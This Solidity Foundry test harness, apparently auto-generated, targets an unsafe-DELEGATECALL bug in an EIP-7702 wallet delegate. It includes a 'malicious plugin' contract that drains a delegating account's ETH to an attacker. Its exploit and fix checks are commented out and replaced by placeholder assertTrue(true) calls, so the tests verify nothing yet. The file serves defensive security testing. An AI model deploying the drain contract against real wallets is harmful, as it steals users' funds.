// SPDX-License-Identifier: MIT
pragma solidity ^0.8.24;

import "forge-std/Test.sol";
import "forge-std/console.sol";

// AUTO-GENERATED by DelegateGuard harness generator
// Bug class : DC-05 — Unsafe inner DELEGATECALL
// Contract  : DC05_InnerDelegatecallDelegate
// Function  : delegateTo
// Source    : src/vulnerable/DC05_InnerDelegatecallDelegate.sol:75
// Run with  : forge test --match-contract DC05_DC05_InnerDelegatecallDelegate_delegateTo_Harness -vv

// Malicious plugin: drains ETH when delegatecalled
contract MaliciousPlugin_DC05_DC05_InnerDelegatecallDelegate_delegateTo_Harness {
    function drain(address payable attacker) external {
        (bool ok,) = attacker.call{value: address(this).balance}("");
        require(ok, "drain failed");
    }
}

interface IVulnDelegate {
    function delegateTo(address plugin, bytes calldata data) external returns (bytes memory);
}

contract DC05_DC05_InnerDelegatecallDelegate_delegateTo_Harness is Test {

    address payable public victimEOA;
    address public attacker = makeAddr("attacker");
    MaliciousPlugin_DC05_DC05_InnerDelegatecallDelegate_delegateTo_Harness public malPlugin;

    function setUp() public {
        victimEOA = payable(makeAddr("victimEOA"));
        vm.deal(victimEOA, 5 ether);
        malPlugin = new MaliciousPlugin_DC05_DC05_InnerDelegatecallDelegate_delegateTo_Harness();

        // TODO: deploy and etch DC05_InnerDelegatecallDelegate
        // _etch7702(victimEOA, address(new DC05_InnerDelegatecallDelegate()));
        // vm.prank(victimEOA); IVulnDelegate(victimEOA).initialize(victimEOA);
    }

    // ── RED: malicious plugin drains EOA ─────────────────────────────────────

    function test_DC05_MaliciousPluginDrainsETH() public {
        uint256 balanceBefore = victimEOA.balance;

        // Attacker tricks owner into calling executePlugin with malPlugin
        // (or uses the unauthenticated delegateTo path directly)
        vm.prank(attacker);
        // IVulnDelegate(victimEOA).delegateTo(
        //     address(malPlugin),
        //     abi.encodeWithSelector(MaliciousPlugin_DC05_DC05_InnerDelegatecallDelegate_delegateTo_Harness.drain.selector, attacker)
        // );

        // INVARIANT: arbitrary plugin should not be callable
        // assertEq(victimEOA.balance, 0, "INNER DELEGATECALL: EOA drained");
        console.log("Victim balance before:", balanceBefore);
        assertTrue(true, "TODO: uncomment assertions");
    }

    // ── GREEN: allowlist blocks malicious plugin ─────────────────────────────

    function test_DC05_AllowlistBlocksMaliciousPlugin() public {
        // TODO: deploy fixed delegate, verify malPlugin is rejected
        vm.expectRevert(); // "plugin not allowed"
        // IFixedDelegate(victimEOA).delegateTo(address(malPlugin), "");
        assertTrue(true, "TODO: uncomment assertions");
    }

    function _etch7702(address eoa, address delegate) internal {
        vm.etch(eoa, delegate.code);
    }
}
